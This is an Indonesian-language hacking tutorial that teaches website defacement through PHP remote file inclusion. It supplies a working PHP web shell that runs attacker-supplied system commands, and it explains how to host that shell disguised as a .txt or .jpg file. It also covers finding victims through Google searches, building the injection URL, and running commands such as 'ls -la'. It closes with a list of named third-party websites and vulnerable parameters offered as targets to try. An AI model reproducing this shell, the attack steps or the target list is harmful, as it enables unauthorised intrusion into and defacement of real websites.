[ C O P Y L E F T ]

-------------------------------------------------------------------------------------
Title	: DEFACE WEBSITE - with inject php ( spesiall to Nixell )
Author	: #kartubeben crew @ Dalnet
Thanks	: Allah SWT
E-mail	: m_beben@gawab.com
Website	: www.kartubeben.com
Spesial	: Kawan-kawan yang udah mau sharing dalam komunitas, apapun namanya
-------------------------------------------------------------------------------------

Artikel  ini penulis  buat khusus  spesial  buat  Nixell yang  mo ngajarin  pacarnya 
tentang deface website.

Pada edisi kali ini kita akan melakukan deface dengan munggunakan bug php dan sering
kita sebut dengan "inject php".  Tetapi sebelum memasuki ke menu utama,  ada baiknya
jika kita mengetahui latar belakang  permasalahan mengapa hal tersebut dapat terjadi
dan lebih parah lagi adalah dapat dieksploitasi.

Pada PHP,  kelemahan terbesar yang membuka kelemahan lainnya adalah pada konfigurasi
PHP  itu  sendiri  (itu  menurut  penulis  pribadi).  Dimana  seorang  victim  tidak
memperhatikan bagaimana dia menginstalasi PHP-nya.

Ada beberapa kelemahan yang disinyalir, diantaranya adalah kesalahan pemograman yang
juga  sangat  sering terjadi  pada bug-bug  .cgi yang tidak melakukan validasi input
user sehingga  user dapat  memasukkan  karakter "|"  yang berarti membuka kanal exec
atau sama saja dengan menggunakan fungsi exec().

Lalu, apa yang terjadi pada PHP sehingga hal yang sama dapat terjadi padanya ???

Baik,  kita langsung  saja menuju ke tutorial singkat kita.  Tidak perlu memusingkan
diri dari mencari sebab dan akibat dari kesalahan php ini :P~

Copy pastekan ini ke dalam site anda, bisa di geocities atau server  terserah  anda,
yang jelas file ini akan anda gunakan untuk melakukan penjebolan terhadap target.


-------------------------------------------------------------------------------------
</center><center></center></center>
<br>
<font face="verdana" size="3">
<center><b>CMD</b> - System Command<br><br></center>
</font>
<font face="Verdana" size="1"></center><br>
<hr>
<br>
<pre><font face="Verdana" size="1">
<?
  // CMD - To Execute Command on File Injection Bug ( gif - jpg - txt )
  if (isset($chdir)) @chdir($chdir);
  ob_start();
  system("$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp");
  $output = ob_get_contents();
  ob_end_clean();
  if (!empty($output)) echo str_replace(">", "&gt;", str_replace("<", "&lt;", $output));
?>
</font></pre>
<br>
<hr>
<br>
-------------------------------------------------------------------------------------

Anda bisa menyimpan script tersebut dengan  nama  cmd.txt  di  site  anda  dan  kita
misalkan bahwa site kita bernama www.beben.com

Lalu  langkah  selanjutnya  adalah mencari  korban dari php  inject kita.  Kita bisa
mencarinya di  search engine  favorite  kita.  Penulis  sendiri  menggunakan  google
alat untuk mencari target.

Misalnya kita mendapatkan target www.korban.com/index.php?id=beben.html

Nah kita tinggal membuang beben.html dan menggantinya dengan php  inject yang  telah
kita siapkan.

Jadi setelah kita membuangnya dan memasukkan inject maka url dari site tersebut akan
menjadi  :   www.korban.com/index.php?id=http://www.beben.com/cmd.jpg?&cmd=<perintah
unix di sini>.

Misalnya : www.korban.com/index.php?id=http://www.beben.com/cmd.jpg?&cmd=ls -la

Langkah selanjutnya tinggal anda membaca tutorial 1 dan 2 di : 
www.geocities.com/artikel_beben/text



Beberapa target yang patut dicoba :

- www.jivebug.co.uk/index.php?kwd=

- www.m-na.de/2002/really/

- www.israelfairs.org/index.php?content=